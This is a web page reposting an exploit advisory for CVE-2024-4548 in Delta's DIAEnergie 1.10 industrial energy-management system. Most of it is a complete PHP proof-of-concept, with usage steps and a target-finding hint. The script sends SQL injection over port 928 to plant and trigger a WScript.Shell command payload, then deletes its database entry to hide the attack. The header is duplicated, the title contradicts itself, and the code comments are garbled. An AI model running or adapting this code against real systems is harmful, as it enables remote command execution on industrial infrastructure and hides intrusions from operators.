Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

DIAEnergie 1.10 SQL Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 105
=============================================================================================================================================
| # Title : DIAEnergie 1.10 =============================================================================================================================================
| # Title : DIAEnergie 1.10 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.deltaww.com/en-US/products/DIAEnergie-Industrial-Energy-Management-System/ALL/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The code attempts to establish a connection with the targeted server over the network.

If the connection is successful, it sends a malicious SQL query to inject commands into the database.

After injection, the script cleans the logs to ensure that the attack is not easily detected.

( https://packetstorm.news/files/id/180334/ CVE-2024-4548 )

[+] save code as poc.php.

[+] Set Target : line 114

[+] USage : php poc.php

[+] PayLoad :

<?php

class CustomSQLInjection
{
const TARGET_PORT = 928;
const TARGET_HOST = 'target_host'; // ?? ????? ????? ???

private $payload;

public function __construct($cmd)
{
// ????? ??????? ?????? ???????
$this->payload = "CreateObject(\"WScript.Shell\").Run(\"cmd /c $cmd\")";
}

public function check()
{
try {
$sock = $this->connect();
fwrite($sock, 'Who is it?');
$res = fread($sock, 1024);

if (empty($res)) {
echo "Received an empty response.\n";
return 'Unknown';
}

echo "Who is it response: $res\n";

preg_match('/\b\d+\.\d+\.\d+\.\d+\b/', $res, $version);

if (empty($version)) {
return 'Detected';
}

echo "Version retrieved: " . $version[0] . "\n";

if (version_compare($version[0], '1.10.1.8610', '>')) {
return 'Safe';
}

return 'Appears';

} catch (Exception $e) {
echo "Error: " . $e->getMessage() . "\n";
return 'Unknown';
}
}

public function exploit()
{
// ??? ???????
$this->execute_command($this->payload);
}

private function execute_command($cmd)
{
$scname = bin2hex(random_bytes(rand(5, 10)));

echo "Using random script name: $scname\n";

$random_date = date('Y-m-d', rand(2024, 2026)) . '-' . sprintf('%02d', rand(1, 12)) . '-' . sprintf('%02d', rand(1, 29));
echo "Using random date: $random_date\n";

$random_time = sprintf('%02d:%02d:%02d', rand(0, 23), rand(0, 59), rand(0, 59));
echo "Using random time: $random_time\n";

try {
echo "Sending SQL injection...\n";

$sock = $this->connect();
fwrite($sock, "RecalculateHDMWYC~$random_date $random_time~$random_date $random_time~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'$scname', N'$cmd', N'', N'');--");
$res = fread($sock, 1024);

if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
throw new Exception("Unexpected reply from the server: $res");
}

echo "Injection - Expected response received: $res\n";

fclose($sock);

// Trigger the script execution
echo "Triggering script execution...\n";
$sock = $this->connect();
fwrite($sock, "RecalculateScript~$random_date $random_time~$random_date $random_time~1");
$res = fread($sock, 1024);

if ($res !== 'Recalculate Script Start!') {
throw new Exception("Unexpected reply from the server: $res");
}

echo "Trigger - Expected response received: $res\n";

fclose($sock);

echo "Script successfully injected, check thy shell.\n";

} catch (Exception $e) {
echo "Error: " . $e->getMessage() . "\n";
$this->cleanup($scname);
}
}

private function cleanup($scname)
{
echo "Cleaning up database...\n";
try {
$sock = $this->connect();
fwrite($sock, "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='$scname';--");
$res = fread($sock, 1024);

if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
throw new Exception("Unexpected reply from the server: $res");
}

echo "Cleanup - Expected response received: $res\n";
fclose($sock);

} catch (Exception $e) {
echo "Error during cleanup: " . $e->getMessage() . "\n";
}
}

private function connect()
{
// ??????? ???????? fsockopen
$sock = fsockopen(self::TARGET_HOST, self::TARGET_PORT, $errno, $errstr, 10);
if (!$sock) {
throw new Exception("Connection failed: $errstr ($errno)");
}
return $sock;
}
}

// ????? ????? ???? ???? ??????
$cmd = 'dir'; // ?????? ??? ????? ?????? ???? ???? ?? ??????
$exploit = new CustomSQLInjection($cmd);
$exploit->check();
$exploit->exploit();

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share